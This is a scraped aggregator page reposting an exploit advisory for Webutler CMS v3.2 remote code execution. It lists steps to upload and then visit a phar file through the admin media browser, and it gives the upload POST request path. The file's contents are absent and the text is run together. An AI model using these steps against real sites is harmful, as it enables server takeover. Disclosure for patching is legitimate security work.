Webutler 3.2 Shell Upload - KizzMyAnthia.com : vimarsana.com

Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs: RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true

Related Keywords

, Software Link , Exploit Title , Remote Code Execution ,